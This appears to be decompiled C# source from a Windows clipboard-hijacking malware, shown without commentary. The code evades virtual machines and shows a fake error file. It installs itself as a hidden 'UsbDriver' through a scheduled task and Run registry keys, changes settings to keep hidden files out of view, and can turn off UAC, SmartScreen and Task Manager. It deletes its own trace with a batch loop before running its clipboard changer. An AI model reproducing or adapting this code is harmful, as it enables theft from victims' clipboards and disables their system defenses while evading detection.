// Token: 0x06000056 RID: 86 RVA: 0x00004278 File Offset: 0x00002478 public static void CopyAndShelduderInizialize() { ProcessControl.KillClipInizialize(); string startUpFromAppDataReserv = GlobalPath.StartUpFromAppDataReserv; string text = Path.Combine(startUpFromAppDataReserv, Path.GetFileName(GlobalPath.AssemblyPath.Replace(GlobalPath.AssemblyPath, "Ushellg.exe"))); RunSystem.Scheduler(false, "minute", 1, "highest", "UsbDriver", "\"" + text + "\""); RegistryControl.RegStartupInizialize(false, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "UsbDriver", text); Directory.Delete(GlobalPath.StartUpFromAppDataReserv); Thread.Sleep(2000); if (!Directory.Exists(startUpFromAppDataReserv) && GlobalDirectory.CreateDirectory(startUpFromAppDataReserv)) { File.Copy(GlobalPath.AssemblyPath, text, false); Thread.Sleep(2000); if (File.Exists(text)) { if (RunCheck.IsUserAdministrator()) { RunSystem.Scheduler(true, "minute", 1, "highest", "UsbDriver", "\"" + text + "\""); RegistryControl.RegStartupInizialize(true, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "UsbNDriver", text); if (!GlobalFile.IsHideOrNo()) { GlobalFile.HideFile(text, FileAttributes.Hidden); return; } } else { RegistryControl.RegStartupInizialize(true, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "UsbNDriver", text); if (!GlobalFile.IsHideOrNo()) { GlobalFile.HideFile(text, FileAttributes.Hidden); } ProcessControl.RunFile(text); } } } }
// Token: 0x06000008 RID: 8 RVA: 0x00002450 File Offset: 0x00000650 public static void Inizialize(string pathfile) { try { using (StreamWriter streamWriter = new StreamWriter(pathfile)) { streamWriter.WriteLine("@echo off"); streamWriter.WriteLine(":loop"); streamWriter.WriteLine("del \"" + GlobalPath.GetFileName + "\""); streamWriter.WriteLine("if Exist \"" + GlobalPath.GetFileName + "\" GOTO loop"); streamWriter.WriteLine("del %0"); streamWriter.Flush(); } } catch (Exception ex) { File.WriteAllText("Self_Error.txt", ex.Message); } if (File.Exists(pathfile)) { ProcessControl.RunFile(pathfile); } }
public static void Main() { if (RunCheck.CheckMutex()) { Date date = new Date(); if (date.AntiVm && CheckVirtual.CheckWMI()) { Environment.Exit(0); } if (date.Delay) { Program.Sleeping(RunCheck.ThreadSleep); } if (GlobalPath.AssemblyPath.StartsWith(GlobalPath.StartUpFromAppDataReserv, StringComparison.OrdinalIgnoreCase)) { if (!GlobalFile.IsHideOrNo()) { GlobalFile.HideFile(GlobalPath.AssemblyPath, FileAttributes.Hidden); } ClipChanger.StartChanger(); return; } new Thread(delegate() { ProcessControl.KillClipInizialize(); }) { IsBackground = true }.Start(); if (date.AddGarbage) { new Thread(delegate() { Garbage.InizializeTrash(500); }).Start(); } if (date.FakeText) { File.WriteAllText(string.Concat(new string[] { "Error.txt" }), GlobalPath.MessageErrorTextForUser); } if (date.AddInSystemRun) { InjReg.CopyAndShelduderInizialize(); RegistryControl.ToogleHidingFolders("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", "Hidden", 2); ExpSetting.RefreshExplorer(); if (date.Uac) { RegistryControl.ToogleUacAdmin("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0); } if (date.Smart) { RegistryControl.ToogleSmartScreen("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer", "SmartScreenEnabled", "Off"); } if (date.TaskLock) { RegistryControl.ToogleTaskMandRegedit("Software\\Microsoft\\Windows\\CurrentVersion\\Policies", 1); } GlobalFile.HideFile(GlobalPath.AssemblyPath, FileAttributes.Normal); Liquidation.Inizialize(GlobalPath.BatchFile); Liquidation.SelfDelete("cmd.exe", "/C choice /C Y /N /D Y /T 1 & Del \"" + GlobalPath.GetFileName); return; } if (!GlobalFile.IsHideOrNo()) { GlobalFile.HideFile(GlobalPath.AssemblyPath, FileAttributes.Hidden); ClipChanger.StartChanger(); return; } } else { Environment.Exit(0); } }